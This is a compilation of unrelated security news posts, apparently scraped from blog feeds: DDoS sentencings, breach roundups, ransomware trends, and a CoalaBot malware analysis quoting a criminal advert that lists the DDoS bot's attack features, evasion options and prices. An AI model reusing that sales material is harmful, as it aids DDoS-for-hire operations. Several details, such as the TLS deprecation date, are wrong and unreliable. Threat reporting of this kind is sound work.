Though we patch by default from the backend to mitigate known exposures such as the latest critical RCE vulnerabilities affecting Drupal, this filter may be useful for our more advanced customers who wish to add an extra layer of logic and protection.

The filter allows you to measure the rate of requests per IP over a period of time to a Drupal login page, helping in detection and prevention of brute-force attacks on Drupal login pages.

The Demand for Logic at the Edge

The customer policy rule engine has proven to be a powerful tool when you need to perform specialized adjustments for specific use cases. Advanced options for building custom security policies complement the default prevention settings in our cloud WAF for complete protection.  

But as organizations of all sizes shift to the cloud and our enterprise customer list has expanded rapidly in turn, the demand for more edge functionality has also increased. We’ve heard time and again that our customers find it very appealing to be able to add advanced logic rules at the edge.

Last year we announced the rollout of advanced Application Delivery Rules. And while we invested in building and improving the engine which drives both of these rule sets, we honed in on the need to (1) develop advanced filters which can help address emerging threats and exploitation and (2) expose logical parts of our classification engine and bot protection layers previously hidden from customer view.

The Move to More Control and Visibility

The newly visible Rules will provide a much more powerful tool for savvy customers who need to tune their policies in order to handle complex cases. This approach is yet another step we’re taking to put enhanced visibility and extended control in our customers’ hands and to stay ahead of the curve in handling the most sophisticated and automated attacks out there.

The post Imperva Increases Self-Service Capability Fourfold with Custom Security Rules appeared first on Blog.

The DDoS attacker rescued by a Disney cruise ship is sentenced to over 10 years in prison

A 34-year old man has been sentenced to more than 10 years in prison, after being found guilty of launching a massive denial-of-service attack against Boston Children’s Hospital.

The sentencing of Martin Gottesfeld, from Somerville, Massachusetts, comes almost three years after he attempted to escape to Cuba – a plan that failed after his speedboat broke down in the choppy sea, and he was picked up by a Disney cruise liner.

Gottesfeld’s troubles began when he heard about the case of Connecticut teenager Justina Pelletier, who was admitted to Boston Children’s Hospital in 2013. The hospital and Pelletier’s parents disagreed about how she should be treated, and eventually she was removed from her parents’ custody.

The case received widespread attention in the media and online, as the teenage girl’s parents argued that she had been “medically kidnapped”.

Publicity about the case spurred an internet campaign under the banner of #FreeJustina, and Gottesfeld, in the name of the Anonymous hacking collective, posted a YouTube video in March 2014 calling for action against the hospital.

That video, in turn, shared links to a Pastebin account – doxing the home address and phone numbers of a judge and doctor involved in Pelletier’s case, and making a clear threat:

“This will be your first and final warning. Failure to comply will result in retaliation which you will not be able to withstand. Free Justina and return her home to her family. The voice of the people will be heard.”

Gottesfeld linked to the information from his Twitter account, where he frequently posted about the #FreeJustina campaign.

At the same time, Gottesfeld launched a distributed denial-of-service (DDoS) attack against Wayside Youth & Family Support Network, a facility offering children mental health counselling. Pelletier was a resident of the facility having been by then discharged from hospital, but still not released into the care of her parents.

The following month Gottesfeld launched another DDoS attack, this time crippling the systems of Boston Children’s Hospital. Prosecutors claimed that the attack knocked the hospital’s internet systems offline for two weeks, disrupting fundraising campaigns and communication between patients and medical staff.

Perhaps unsurprisingly, FBI investigators were able to link Gottesfeld to the YouTube account. For his part, Gottesfeld claims he deliberately didn’t bother covering his tracks as he didn’t believe he had done anything wrong.

In the early morning of October 1, 2014, FBI investigators searched Gottesfeld’s home, seizing computer equipment.

As the investigation into the DDoS attacks proceeded over the coming months, Gottesfeld realised the seriousness of the case against him – and in February 2016 fled with his wife Dana to Miami. Their plan? To buy a boat off Craigslist, and sail it to Cuba where they would be beyond the reach of US authorities.

The couple purchased a speedboat for US $5000, abandoned their car, and immediately set off across the ocean for what they believed to be the sanctuary of Cuba. But after hours of battling rough waves, their boat broke down. They were stranded, with no boats or land in sight. And they had told no-one of their plan.

Attempts to restart the boat failed, and eventually Gottesfeld admitted defeat – putting a distress call out on the radio which was thankfully heard by “The Disney Wonder”, an 11-deck cruise ship carrying hundreds of tourists.

In terrible weather conditions, Martin and Dana Gottesfeld were brought safely onboard where they were held in a cabin, with guards stationed outside.

Authorities in the Bahamas contacted the FBI office in Boston, and when the cruise ship returned to the US mainland, Gottesfeld and his wife were arrested and handcuffed.

The hacker’s dream of escape to Cuba was in tatters.

On Thursday, Gottesfeld was sentenced to 121 months in prison, and ordered to pay nearly US $443,000 in restitution.

“Make no mistake, your crime was contemptible, invidious and loathsome,” said US District Judge Nathaniel Gorton.

To reads more about the case, and Gottesfeld’s background, I strongly recommend reading this article in Rolling Stone.

There’s no doubt that Gottesfeld did many foolish things, but when you read more about the case (Check out this excellent article in Rolling Stone which explores his background) you can’t help but conclude that he had ultimately good intentions that were catastrophically misdirected.

A prison sentence of over 10 years for the DDoS attacks that Martin Gottesfeld perpetrated feels very harsh to me.

Gottesfeld says he plans to appeal his sentence. I can’t condone what he did, but I wish him well for the future.

Man whose DDoS attacks took down entire country’s Internet jailed

By Waqas

A court in London has sentenced a British and Israeli cyber criminal Daniel Kaye aka “BestBuy and Popopret” to two years and eight months in prison for conducting large scale DDoS attacks on Lonestar Cell MTN disrupting country’s Internet and causing tens of millions of dollars in damages. Kaye (30) was charged for DDoS attacks against British and German […]

This is a post from Read the original post: Man whose DDoS attacks took down entire country’s Internet jailed

Cyber Security Roundup for October 2018

Aside from Brexit, Cyber Threats and Cyber Attack accusations against Russia are very much on the centre stage of UK government's international political agenda at the moment. The government publically accused Russia's military 'GRU' intelligence service of being behind four high-profile cyber-attacks, and named 12 cyber groups it said were associated with the GRU. Foreign Secretary Jeremy Hunt said, "the GRU had waged a campaign of indiscriminate and reckless cyber strikes that served no legitimate national security interest".

UK Police firmly believe the two men who carried out the Salisbury poisoning in March 2018 worked for the GRU.

The UK National Cyber Security Centre said it had assessed "with high confidence" that the GRU was "almost certainly responsible" for the cyber-attacks, and also warned UK businesses to be on the alert for indicators of compromise by the Russian APT28 hacking group.  The NCSC said GRU hackers operated under a dozen different names, including Fancy Bear (APT28), had targetted:
  • The systems database of the Montreal-based World Anti-Doping Agency (Wada), using phishing to gain passwords. Athletes' data was later published 
  • The Democratic National Committee in 2016, when emails and chats were obtained and subsequently published online. The US authorities have already linked this to Russia.
  • Ukraine's Kyiv metro and Odessa airport, Russia's central bank, and two privately-owned Russian media outlets - and news agency Interfax - in October 2017. They used ransomware to encrypt the contents of a computer and demand payment 
  • An unnamed small UK-based TV station between July and August 2015, when multiple email accounts were accessed and content stolen

Facebook was fined the maximum amount of £500,000 under pre-GDPR data protection laws by the UK Information Commissioner's Office (ICO) over the Cambridge Analytica Scandal. Facebook could face a new ICO fine after revealing hackers had accessed the contact details of 30 Million users due to a flaw with Facebook profiles. The ICO also revealed a 400% increase in reported Cyber Security Incidents and another report by a legal firm RPC said the average ICO fines had doubled, and to expect higher fines in the future. Heathrow Airport was fined £120,000 by the ICO in October after a staff member lost a USB stick last October containing "sensitive personal data", which was later found by a member of the public.

Notable Significant ICO Security Related Fines

Last month's British Airways website hack was worse than originally reported, as they disclosed a second attack which occurred on 5th September 2018, when the payment page had 22 lines of malicious Javascript code injected in an attack widely attributed to Magecart.  Another airline Cathay Pacific also disclosed it had suffered a major data breach that impacted 9.4 million customer's personal data and some credit card data.

Morrisons has lost a challenge to a High Court ruling which made it liable for a data breach, after an employee, since jailed for 8 years, stole and posted thousands of its employees' details online in 2014.  Morrisons said it would now appeal to the Supreme Court., if that appeal fails, those affected will be able to claim compensation for "upset and distress". 

Interesting article on Bloomberg on "How China Used a Tiny Chip to Infiltrate U.S. Companies". However, there was a counter-narrative to the Bloomberg article on Sky News. But didn't stop Ex-Security Minister Admiral Lord West calling the Chinese when he said Chinese IT Kit 'is putting all of us at risk' if used in 5G.  He raises a valid point, given the US Commerce Department said it would restrict the export of software and technology goods from American firms to Chinese chipmaker Fujian Jinhua BT, which uses Huawei to supply parts for its network, told Sky News that it would "apply the same stringent security measures and controls to 5G when we start to roll it out, in line with continued guidance from government". Recently there have been warnings issued by the MoD and NCSC stating a Chinese espionage group known as APT10 are attacking IT suppliers to target military and intelligence information.

NCSC is seeking feedback on the latest drafts 'knowledge areas' on CyBOK, a Cyber Security body of knowledge which it is supporting along with academics and the general security industry.

Google are finally pulling the plug on Google+, after user personal data was left exposed. Google and the other three major web browser providers in the world said, in what seems like coordinated announcements, businesses must accept TLS Version 1.0 and 1.1 will no longer support after Q1 2018.

So its time to move over to the more secure TLS V1.2 or the more secure & efficient TLS V1.3.


Cyber Security Roundup for August 2018

The largest data breach disclosed this month was by T-Mobile, the telecoms giant said there had been "unauthorised access" to potentially 2 million of their 77 million customer accounts. According to the media, a hacker took advantage of a vulnerability in a T-Mobile API (application programming interface). It was a vulnerable API used by Air Canada mobile App which was also exploited, resulting in the compromise of 20,000 Air Canada customer accounts. Air Canada promptly forced a password change to all of its 77 million customer accounts as a result, however, the airline faced criticism from security experts for advising a weak password strength. Namely, a password length of 8, made up of just characters and digits. Both of these hacks underline the importance of regularly penetration testing Apps and their supporting infrastructure, including their APIs.

Hackers stole up to 34,000 Butlin guest records, reportedly breaching the UK holiday camp firm through a phishing email. Dixons Carphone upped the estimated number of customer records breached in a hack last year from 1.2 million to 10 million, which includes 5.9 million payment cards. There was no explanation offered by Dixons to why it had taken so long to get a grip on the scale of the data breach, which was reported as occurring in July 2017.

Huawei continues to face scrutiny over the security of their products after the UK National Cyber Security Centre (NCSC) issued a warning about using the Chinese tech manufacturing giant's devices in a security report. Huawei recently took over from Apple as the world's second largest provider of smartphones. A 16 year old Australian 'Apple fanboy' found himself in court after hacking into Apple's network.

On the international scene, Microsoft announced it had thwarted Russian data-stealing attacks against US anti-Trump conservative groups, by taking down six domains which hosted mimicked websites, which were likely to be used in future phishing campaigns. The Bank of Spain's website was taken out by a DDoS attack, and a Chinese Hotel Group's 140Gb customer database was found for sale on the dark web. The PGA golf championship was hit by a ransomware, and the FBI arrested three key members of the notorious FIN7 hacking group, the group is said to be responsible for stealing millions of credit card and customer details from businesses across the world.

On the personal front, the EC-Council confirmed my Computer Hacking Forensic Investigation (CHFI) certification had been renewed until 2021. I dropped into B-Sides Manchester this month, the highlight was a demonstration of a vulnerability found by Secarma researches, namely a PHP flaw which places CMS sites at risk of remote code execution

There was plenty of critical security patches released by the usual suspects, such as Microsoft, Cisco, and Adobe, the latter firm released several out-of-band patches during August. A critical update was released for Apache Struts (popular web server) and a reminder that Fax machines and all-in-one devices network devices could be used as a way into corporate networks by hackers.

Finally, there were a couple of interesting cybercrime articles posted on the BBC's news website this month,  Cyber-Attack! Would your firm handle it better than this? and Unpicking the Cyber-Crime Economy


Cyber Security Roundup for March 2018

In the wake of the global political fallout over the Salisbury nerve agent attack, there are reports of a growing threat of Russian state or Russian state-affiliated hacking groups conducting cyber attack reprisals against UK organisations, government officials have directly warned bosses at electricity, gas and water firms, Whitehall departments and NHS hospitals to prepare for a state-sponsored cyber assault

Large-scale data breaches were disclosed with Under Armour’s Fitness App MyFitnessPal (1.5 million personal records compromised), Orbitz (880k payment cards at risk), and at a Walmart partner (1.3 million personal records compromised). The latter was caused when an AWS S3 bucket holding a Walmart database was left with open access, which isn't the first time a cloud service misconfiguration has caused a major data breach.

TalkTalk were warned about their website’s poor security after a hacker known as 'B' disclosed a cross-site scripting vulnerability on the website to Sky News. TalkTalk was given a record £400,000 fine by the Information Commissioner's Office following a major website breach in October 2015, which 157,000 customer details were stolen. And the company were told to "be more diligent and more vigilant” and was fined a further £100,000 after data belonging to 21,000 customers were exposed to "rogue" staff at an Indian call centre.

GitHub survived the largest ever DDoS attack recorded thanks to Akamai DDoS protection, which peaked at a massive 1.35 terabytes of data per second.

UK schools were warned they were soft targets for cybercriminals, experts believe many schools are ill-equipped to prevent cyber thefts, with sensitive data such as children’s medical records said to be lucrative on the dark web. There has been a number of security incidents disclosed involving UK schools in recent months.
Gwent Police are facing scrutiny by the Information Commissioner's Office for not informing 450 people that hackers may have accessed their personal information, after discovering the breach over a year ago.

A hacker alleged to be behind a gang the ran the Carbanak and Cobalt bank target malware has been arrested. The gang is reported to be responsible for the theft of up to billion euros through bank transfers and from cash machines, from over 100 banks since 2013




Weekly Cyber Risk Roundup: Record-Setting DDoS Attacks, Data Breach Costs

Last week, researchers observed a 1.35 Tbps distributed denial-of-service attack (DDOS) attack targeting GitHub. It was the largest DDoS attack ever recorded, surpassing the 1.2 Tbps attack against DNS provider Dyn in October 2016.

The attack leveraged a newly observed reflection and amplification vector known as memcached. Akamai researchers warned that other organizations experienced similar DDoS attacks using the new method following the GitHub attack and that even larger attacks may be possible in the future.

“Memcached can have both UDP and TCP listeners and requires no authentication,” the researchers wrote. “Since UDP is easily spoofable, it makes this service vulnerable to use as a reflector. Worse, memcached can have an amplification factor of over 50,000, meaning a 203 byte request results in a 100 megabyte response.”

The attack was mitigated within 10 minutes, GitHub said. The following day GitHub was the target of a second DDoS attack that disrupted availability for a 15-minute period, ThousandEyes reported.

“Because of its ability to create such massive attacks, it is likely that attackers will adopt memcached reflection as a favorite tool rapidly,” Akamai researchers wrote. “The good news is that providers can rate limit traffic from source port 11211 and prevent traffic from entering and exiting their networks, but this will take time.”

Wired reported there are approximately 100,000 memcached servers that currently have no authentication protection and can be abused by malicious attackers to carry out similar potentially massive, botnet-free DDoS attacks.


Other trending cybercrime events from the week include:

  • W-2 information breached: The University of Alaska said that 50 current and former employees and students had their personal information compromised when hackers gained access to their university accounts by answering security questions and resetting their passwords. The Association for Supervision and Curriculum Development is notifying employees that their W-2 information was compromised due to a spear phishing attack. Wallace Community College Selma said that current and former employees had their W-2 information compromised when an employee fell for a phishing scam. Curtis Lumber is notifying employees that their personal information was stolen in a spear phishing attack, and some of those employees have reported issues related to filing their federal taxes following the incident.
  • Ransomware infections continue: The Colorado Department of Transportation said that computers had been reinfected with ransomware eight days after an initial attack. Both the Children’s Aid Society of Oxford County and the Family and Children’s Services of Lanark, Leeds and Grenville in Canada were the victims of a ransomware infection. Jemison Internal Medicine is notifying 6,550 patients of a ransomware infection that may have compromised their personal information.
  • Payment card breaches and service disruptions: A number of Tim Hortons locations in Canada were temporarily shut down or were forced to close their drive-throughs after malware was discovered targeting Panasonic cash registers. NIS America said that customers of its online stores had their information compromised due to being redirected to a malicious site that would harvest their information during the checkout process. North 40 is notifying customers that their payment card information may have been compromised due to unauthorized access to its e-commerce website.
  • Notable data breaches: A hacker gained access to the intranet of Germany’s government and accessed confidential information. St. Peter’s Surgery and Endoscopy Center is notifying patients that their personal and medical information may have been compromised due to unauthorized access to its servers. Healthcare vendor FastHealth submitted a data breach notification regarding unauthorized access to its web server. Porsche Japan said that the information of customers was exposed due to a hack. Metro Wire Rope Corporation said that an employee email account was compromised after the employee opened a  malicious attachment with credential-stealing capabilities. The French news magazine L’Express exposed a database containing the personal information of readers and after being notified of the exposure took a month to secure the data. U.S. Marine Corps Forces Reserve may have compromised the personal information of 21,426 individuals due to sending an unencrypted email with an attachment to the wrong email distribution list.
  • Other notable events: The Financial Services Information Sharing and Analysis Center said that one of its employees was successfully phished, and the compromised email account was used to send further phishing messages to other members, affiliates, and employees. The recent hack of the PyeongChang Winter Olympics that led to Internet disruptions and website downtime was a false-flag operation carried out by Russian military spies to make it appear as if the attack was carried out by North Korea, U.S. intelligence officials said. An Arkansas man who developed the remote-access Trojan NanoCore and marketed it on Hack Forums has been sentenced to 33 months in prison.

SurfWatch Labs collected data on many different companies tied to cybercrime over the past week. Some of the top trending targets are shown in the chart below.


Cyber Risk Trends From the Past Week


Equifax was back in the news this week after announcing it had discovered an additional 2.4 million U.S. consumers who were affected by its massive 2017 data breach, bringing the total number of people impacted to 147.9 million.

“This is not about newly discovered stolen data,” said Paulino do Rego Barros, Jr., Interim chief executive officer in a press release. “It’s about sifting through the previously identified stolen data, analyzing other information in our databases that was not taken by the attackers, and making connections that enabled us to identify additional individuals.”

The company also said that it expects breach-related costs to hit $275 million in 2018, which Reuters noted could make the Equifax breach the most costly hack in corporate history:

The projection, which was disclosed on a Friday morning earnings conference call, is on top of $164 million in pretax costs posted in the second half of 2017. That brings expected breach-related costs through the end of this year to $439 million, some $125 million of which Equifax said will be covered by insurance.

Those breach-related costs could rise further once legal actions from consumers and regulators are finally resolved. However, Sen. Elizabeth Warren recently stated that “Equifax is still making money off their own breach” and that even consumers who do not want to do business with them may end up buying credit protection services from another company who “very well may be using Equifax to do the back office part.”

It’s the same criticism she waged in January when introducing a bill with Sen. Mark Warner to address problems related to credit agencies collecting data without strict protections in place to secure that information. As CNET noted, if such a bill was in place at the time of the Equifax breach, the company likely would have faced a fine of at least $14.3 billion.

CoalaBot : http Ddos Bot

CoalaBot appears to be build on August Stealer code (Panel and Traffic are really alike)

I found it spread as a tasks in a Betabot and in an Andromeda spread via RIG fed by at least one HilltopAds malvertising.

2017-09-11: a witnessed infection chain to CoalaBot

A look inside :
CoalaBot: Login Screen
(August Stealer alike) 

CoalaBot: Statistics

CoalaBot: Bots

CoalaBot: Tasks
CoalaBot: Tasks

CoalaBot: New Taks (list)

CoalaBot: https get task details

CoalaBot: http post task details

CoalaBot: Settings
Here is the translated associated advert published on 2017-08-23 by a user going with nick : Discomrade.
(Thanks to Andrew Komarov and others who provided help here).
Coala Http Ddos Bot

The software focuses on L7 attacks (HTTP). Lower levels have more primitive attacks.

Attack types:

* - Supports SMART mode, i.e. bypasses Cloudflare/Blazingfast and similar services (but doesn’t bypass CAPTCHA). All types except ICMP/UDP have support for using SSL.

• .NET 2.0 x86 (100% working capacity WIN XP - WIN 7, on later versions ОС .NET 2.0 disabled by default)
• ~100kb after obfuscation
• Auto Backup (optional)
• Low CPU load for efficient use
• Encryption of incoming/outgoing traffic
• No installation on machines from former CIS countries(RU/UA/BL/KZ/...)
• Scan time non-FUD. Contact us if you need a recommendation for a good crypting service.
• Ability to link a build to more than one gate.

• Detailed statistics on time online/architecture/etc.
• List of bots, detailed information
• Number count of requests per second (total/for each bot)
• Creation of groups for attacks
• Auto sorting of bots by groups
• Creation of tasks, the ability to choose by group/country
• Setting an optional time for bots success rate


• Providing macros for randomization of sent data
• Support of .onion gate
• Ability to install an additional layer (BOT => LAYER => MAIN GATE)


• PHP 5.6 or higher
• Мodule for MySQLi(mysqli_nd); php-mbstring, php-json, php-mcrypt extensions


• Created tasks -


• $300 - build and panel. Up to 3 gates for one build.
• $20 - rebuild
The price can vary depending on updates.
Escrow service is welcome.

Help with installation is no charge.


VT link
MD5 f3862c311c67cb027a06d4272b680a3b
SHA1 0ff1584eec4fc5c72439d94e8cee922703c44049
SHA256 fd07ad13dbf9da3f7841bc0dbfd303dc18153ad36259d9c6db127b49fa01d08f

Emerging Threats rules :
2024531 || ET TROJAN MSIL/CoalaBot CnC Activity

Read More:
August in November: New Information Stealer Hits the Scene - 2016-12-07 - Proofpoint

Cyber Security Predictions for 2017



2016 kicked off with more than 20 million new samples of malware detected and neutralised by PandaLabs – an average of 227,000 per day. This figure is slightly higher than that of 2015, which saw around 225,000 per day.

Throughout 2016, we’ve seen how the number of new malware has been slightly lower than in 2015 — about 200,000 new samples of malware per day on average — however attacks have become more effective.

Cybercriminals are becoming more confident in their abilities, and, although figures have been lower than expected, there is still cause for concern. Hackers appear to be concentrating their efforts into the most profitable attacks, utilising sophisticated techniques that allow them to make quick and easy money in an efficient manner.

Black Hats have turned their focus essentially to productivity, proliferating attacks on businesses that handle massive quantities of data and sensitive information. Once they’ve gained access to these businesses, they are able to infect a large number of computers possible with ransomware, putting themselves in a position to demand millions in ransom or put the data up for sale on the black market.

If there is one thing that hasn’t changed over the course of this year, it’s the popularity of trojans, with ransomware at the forefront, continuing to top the statistical charts for years.

Ranking the top attacks of 2016



We know that ransomware is a substantial business for cybercriminals, but it is incredibly tricky to measure the number of attacks reliably. What can be noted is the evolution of Ransomware attacks, in some cases having become particularly aggressive, as is the case of Petya. Instead of encrypting documents, Petya goes straight for the computer’s Master Boot Record (MBR) and makes it unserviceable until a ransom is paid.

Abuse of system tool PowerShell has risen this year, installed by default in Windows 10 and frequently used in attacks to avoid detection by security solutions installed on victims computers.

In Q2 of 2016, one of the strangest cases of Ransomware involved a company in Slovenia. The company’s head of security received an email out of Russia informing him that their network had been compromised and that they were poised to launch ransomware on all of their computers. If the company didn’t pay around €9000 in Bitcoins within 3 days. To prove that they did in fact have access to the organisations network, the hackers sent a file with a list of every device connected to the company’s internal network.

Ransomware as a Service (RaaS) presented as the latest development in the Ransomware industry. In Q3 we witnessed to a higher level of specialisation in the ransomware trade. The best example of this featured the creators of the ransomware Petya and Mischa, specialised in the development aspect of malware and its corresponding payment platforms, leaving distribution in the hands of third parties. Once the creators have done their part they leave it up to the distributors to be in charge of infecting their victims. Much like in the legal world, the distributors’ profit is derived from a percentage of the money acquired. The higher the sales, the higher the percentage that they receive.

Malicious email

Attacks don’t only come in the form of malvertising or compromised websites. A large number of them still arrive through email in the form of false invoices or other notifications. An attack of this sort was carried out in at least two European countries, in which cybercriminals posed as their respective local electricity supply companies. The message contained no attachment, showing only the billing information in text and including a link that when clicked would take you to the invoice details. The hook was an exorbitantly high payment that would entice an emotional response so that the recipient would click through to consult the supposed bill without thinking. Upon clicking the link, the user was directed to a website that resembled the company’s real website, where a bill could be downloaded. If the client downloaded and opened the file, they became infected with ransomware.

Business Email Compromise Phishing

Hackers will investigate how the company operates from the inside and get information from their victims off of social networks to give credibility to their con. The attackers then pose as the CEO or financial director of a company and request a transfer from an employee. This kind of attack is rapidly gaining in popularity.

A notable case this year affected Mattel, the well-known toy manufacturer of Barbies and Hot Wheels. A high ranking executive received a message from the recently appointed CEO soliciting a transfer of $3 million to a bank account in China. After making the transfer, he then confirmed with the CEO that it was done, who in turn was baffled, having not given such an order. They got in touch with the American authorities and with the bank, but it was too late and the money had already been transferred.

In this case they were fortunate. It was a bank holiday in China and there was enough time to alert the Chinese authorities. The account was frozen, and Mattel was able to recover their money.


Mobile Devices

SNAP is one the most popular vulnerabilities that we’ve seen this year – affecting LG G3 mobile phones. The problem stemmed from an error in LG’s notifications app, called Smart Notice, which gives permission for the running of any JavaScript. The researchers at BugSec discovered the vulnerability and notified LG, which rapidly published an update that resolved the problem.

Gugi, an Android trojan, managed to break through Android 6’s security barriers to steal bank credentials from apps installed on the phone. To accomplish this, Gugi superimposed a screen on top of the screen of the legitimate app asking for information that would then be sent directly to the criminals without their victims’ knowledge.

In August, Apple published an urgent update of version 9.3.5 of iOS. This version resolves three zero-day vulnerabilities employed by a software spy known as Pegasus, developed by the NGO Group, an Israeli organization with products similar to those offered by Hacking Team.

Internet of Things

Connected cars are at risk from cyber-attack – investigators at the University of Birmingham showed how they had succeeded in compromising the power door lock system of every vehicle sold by the Volkswagen Group in the last twenty years. Researchers Charlie Miller and Chris Valasek, who last year demonstrated how to hack a Jeep Cherokee, took it one step further this year to show how they could manipulate at will the throttle, the brake, and even the steering wheel while the car was in gear.

Smart homes are just as vulnerable to attack – researchers Andrew Tierney and Ken Munro showed a proof of concept that they built to hijack a thermostat. After taking control of the thermostat (inserting an SD card in it), he raised the temperature to 99 degrees Fahrenheit and required a PIN to deactivate it. The thermostat connected to an IRC channel, giving the MAC address of as an identifier of every compromised device. It demanded a bitcoin in exchange for the PIN, which changed every 30 seconds.



2016 saw the United States go on the offensive and concede that it is launching cyber-attacks against Daesh targets. Robert Work, United States Deputy Secretary of Defense, made this clear in statements to CNN.

In February, South Korean officials discovered an attack originating from North Korea. The attack allegedly began over a year ago, its primary target being 140,000 computers belonging to organisations and government agencies, as well as defense contractors. According to police statements, more than 42,000 documents were stolen, of which 95% were related to defense, such as, for example, documents containing plans and specs for the F15 fighter jet.

At the height of the United States presidential election, one of the most significant incidents that took place was the discovery of an attack on the DNC (Democratic National Committee) in which a stockpile of data was plundered, and was then leaked to the public.

On the subject of the elections, the FBI issued an alert after detecting two attacks on electoral websites, and at least one of the attackers — identified as foreigners — was able to make off with voter registration data.

In August, a group calling itself “The Shadow Brokers” announced that it had hacked the NSA and published some of the “cyber weapons” that it had stolen, promising to sell the rest to the highest bidder.


In June, a criminal dubbed “The Dark Overlord” put patient information from three US institutions up for sale on the black market. He had stolen information from over 650,000 patients and asked for around $700,000 for its return. Shortly thereafter, he put the personal information of 9.3 million clients of a medical insurance agency up for sale for 750 bitcoins.

In the last few months, Dropbox became another victim of cybercrime. It was recently revealed that the well-known file sharing service suffered an attack in 2012. The outcome: the theft of data from 68 million users.

One of the biggest attacks to date affected Yahoo – despite having taken place in 2014 the attack only become known recently. A total of 500 million accounts were compromised, becoming the greatest theft in history.

In August 2016 we saw one of the greatest bitcoin thefts in history. Bitfinex, a company that deals in the commerce and exchange of cryptocurrency, was compromised and had an equivalent of 60 million dollars in bitcoins stolen from it, money which belonged to clients that had deposited their bitcoins in this “bank”. There is still no evidence pointing to the culprits, and the company has offered no information as to how it happened, as law enforcement agencies are still investigating the case.

DDoS Attacks

In September, Brian Krebs, the famed journalist specialising in security, blew the cover off of vDOS, a “business” that offered DDoS attack services. Shortly thereafter, the people responsible, who in two years had lead 150,000 attacks and made a profit of $618,000, were arrested.

In retaliation hackers took down Krebs’s website through a crippling DDoS attack. In the end, Google, through its Project Shield, was able to protect it and the page came back online.

In the last quarter of the year, a wave of large-scale cyberattacks against the American internet provider DynDNS disrupted the service of some major global corporations’ websites. The brutal attack affected major organisations and international communications tools, such as Netflix, Twitter, Amazon, and The New York Times. Service was interrupted for almost 11 hours, affecting more than a billion clients worldwide.


POS’s and Credit Cards

The popular American fast food chain Wendy’s saw the Points of Sale terminals at more than 1,000 of its establishments infected with malware that stole credit card information from its clients. PandaLabs discovered an attack carried out with malware known as PunkeyPOS, which was used to infect more than 200 US restaurants.

Another such attack was discovered in 2016 by PandaLabs. Once again, the victims were US restaurants, a total of 300 establishments whose POS’s had been infected with the malware PosCardStealer.

Financial Institutions

This year, the Central Bank of Bangladesh suffered an attack in which 1 billion US dollars in bank transfers were made. Fortunately, a large portion of those transfers were blocked, although the thieves had already succeeded in making off with 81 million dollars.

Shortly after that we witnessed two similar cases: one against a bank in Vietnam, another against a bank in Ecuador.


Social Networks

The security of 117 million LinkedIn users was at risk after a list of email address and their respective passwords were published.

On Twitter, 32 million usernames and passwords were put up for sale for around $6000. The social network denied that the account information had been aquired from their servers. In fact, the passwords were in plain text and the majority of them belonged to Russian users, hinting at the possibility that they were attained by means of phishing or Trojans.

This year it came to light that MySpace was attacked. The intrusion happened in 2013, although up until May of this year it remained unknown. Usernames, passwords, and email addresses were taken, reaching up to 360 million affected accounts. A user may not have used MySpace in years, but if they are in the habit of reusing passwords, and aren’t using two-factor authentication they could be at risk.

Activating two-factor authentication, creating complex passwords and not reusing them for different websites is recommended to avoid these risks.

What cyber nightmares does 2017 have in store for us?


Having taken center stage in 2016, Ransomware will most likely do so again in 2017. In some ways, this kind of attack is cannibalising other more traditional ones that are based on information theft. Ransomware is a simpler and more direct way to make a profit, eliminating intermediaries and unnecessary risks.

Taking every idea into consideration


Attacks on companies will be more numerous and sophisticated. Companies are already the prime target of cybercriminals. Their information is more valuable than that of private users.

Cybercriminals are always on the lookout for weaknesses in corporate networks through which they can gain access. Once inside, they use lateral movements to access resources that contain the information they are looking for. They can also launch large-scale ransomware attacks (infecting with ransomware all available devices), in order to demand astronomical sums of money to recover the data of affected companies.

Internet of Things

Internet of Things (IoT) is fast becoming the next cybersecurity nightmare. Any kind of device connected to a network can be used as an entryway into corporate and home networks. The majority of these devices have not been designed with security strength in mind. Typically they do not receive automatic security updates, use weak passwords, reuse the same credentials in thousands of devices, and other security flaws – all of this together makes them extremely vulnerable to outside attacks.


The final months of 2016 witnessed the most powerful DDoS attacks in history. It began in September with an attack on Brian Krebs after his having reported on the activities of an Israeli company that offered this kind of service. On the heels of that attack came another on the French company OVH (reaching 1Tbps of traffic) and another on the American company Dyn that left several major tech giants without Internet service.

These attacks were carried out by bot networks that relied on thousands of affected IoT devices (IP cameras, routers). We can be certain that 2017 will see an increase in this kind of attack, which is typically used to blackmail companies or to harm their business.

Mobile Phones

The target is clear here as well — Android devices got the worst of it. Which makes sense, given that Android has the greatest market share. Focusing on one single OS makes it easier for cybercriminals to fix a target with maximal dissemination and profitability.

To complicate matters, updates do not only depend on the rollout of what Android can do, but also depends on each hardware manufacturer’s decision of when and how to incorporate them – if at all. Given the amount of security issues that crop up every month, this situation only puts users at greater risk.


We are living in uncertain times with regards to international relations – threats of commercial warfare, espionage, tariffs with the potential to polarise the positions of the great powers. This can no doubt have vast and serious consequences in the field of cyber-security.

Governments will want access to more information, at a time when encryption is becoming more popular) and intelligence agencies will become more interested in obtaining information that could benefit industry in their countries.

A global situation of this kind could hamper data sharing initiatives — data that large companies are already sharing in order to better protect themselves against cyber-crime, setting standards and international engagement protocols.

The post Cyber Security Predictions for 2017 appeared first on

Cybercrime Surges in Q3

young man with glasses sitting in front of his computer, programming. the code he is working on (CSS) can be seen through the screen.

PandaLabs Q3 Report indicates that incidences of cybercrime continue to increase, with 18 million new malware samples captured this quarter – more than 200,000 samples daily.

The Quarter at a Glance

Cybercrime continues to grow at an exponential rate, fuelled by the opportunity for large financial rewards.

Hackers have taken to developing new variants of successful Ransomware such as Locky, and the development of a model known as Ransomware-as-a-Service (RaaS), whereby developers create Ransomware for distributors, these distributors then target and infect victims – allowing both parties to achieve greater profits.

Another key development was the occurrence of DDoS attacks. Most natably that of Cyber Security journalist Brian Krebs. Krebs exposure of vDoS lead to the arrest of its key members and subsequently made Krebs’ site the target of a massive DDoS attack that saw Google step in to restore the site. As one of the largest attack of its kind, hackers leveraged IoT devices to send 620GB of data per second – at its peak – to the site.
This quarter cyber-attacks targeted multiple gaming sites, gaining access to millions of users’ personal information. These attacks were largely launched using botnets composed of smartphones, and effected users of Overwatch, World of Warcraft and Diablo 3. Further attacks saw more than 3.5 million users exposed when Dota 2 and mobile game Clash of the Kings were targeted. These highlight just a few incidences in the Gaming world in the last 3 months.

The Banking sector remained a target for hackers as attacks on ATM’s, POS terminals and Bitcoin wallets continue to become more frequent and more advanced.

A Taiwanese ATM attack this quarter indicated just how advanced cybercriminals have become when they were able to hack the banks internal network and withdraw over R28 million without even touching the ATM itself.

